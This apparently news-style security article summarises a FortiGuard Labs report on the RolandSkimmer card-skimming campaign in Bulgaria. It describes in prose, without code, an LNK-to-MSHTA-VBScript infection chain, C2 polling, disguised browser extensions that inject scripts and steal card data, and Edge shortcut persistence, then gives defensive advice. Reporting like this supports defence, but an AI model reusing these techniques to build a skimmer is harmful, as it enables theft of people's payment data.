Web-based credit card skimming remains a persistent and evolving threat, and FortiGuard Labs has recently uncovered a sophisticated campaign dubbed βRolandSkimmerβ that highlights this danger. Named after the unique string βRol@and4Youβ embedded in its payload, this campaign targets users in Bulgaria with a new wave of attacks leveraging malicious browser extensions across Chrome, Edge, and Firefox.
The attack begins with a malicious ZIP file, such as βfaktura_3716804.zip.β Once extracted, this ZIP file presents users with a seemingly harmless shortcut file, typically named βfaktura_1065170.Inkβ. However, this shortcut hides a malicious command that covertly executes obfuscated scripts, establishing persistent and covert access to the userβs system.
The malicious LNK file initiates a chain of events, ultimately leading to the deployment of a malicious browser extension.
Initial Execution: The LNK file executes a hidden command that uses MSHTA.exe to run a VBScript.Payload Delivery: This VBScript retrieves an obfuscated VBScript payload from a remote server.Command and Control: The retrieved script establishes a continuous connection loop, polling the attackerβs server for commands.Malicious Script Execution: Once commands are received, the script decodes hexadecimal data and executes the corresponding malicious actions.A critical component of the RolandSkimmer campaign is the use of malicious browser extensions. These extensions are designed to harvest and exfiltrate sensitive financial data, often without the userβs knowledge.
Deceptive Disguise: The Edge extension, for example, is disguised as βDisable Content Security Policy,β misleading users with a seemingly benign name.Extensive Permissions: These extensions request broad permissions, granting them significant control over the userβs browser activity and data.The malicious extensions employed in the RolandSkimmer campaign possess a range of capabilities that enable them to effectively steal sensitive information:
User Tracking: The extensions generate unique identifiers to track users across browsing sessions.Payload Retrieval: They retrieve encrypted payloads from local storage or remote servers.Code Injection: They inject malicious JavaScript code into web pages.Data Monitoring: They monitor user interactions, focusing on form submissions and credit card data.Data Exfiltration: They exfiltrate captured data to a command-and-control (C2) server.To maintain a persistent presence on infected systems, the attackers employ sophisticated techniques, particularly with the Edge browser. This involves copying the legitimate Edge executable, loading the malicious extension, and replacing legitimate Edge shortcuts with malicious ones.
The RolandSkimmer campaign demonstrates the effectiveness of using malicious browser extensions for long-term access and data theft. As FortiGuard Labs emphasizes, βRolandSkimmer underscores the growing sophistication of LNK-based threats,β highlighting how attackers exploit legitimate system tools and scripting capabilities. To defend against such threats, users are advised to βavoid opening unknown LNK filesβ and organizations should βrestrict or monitor the use of unverified browser extensionsβ and βimplement security tools capable of detecting unusual script activityβ.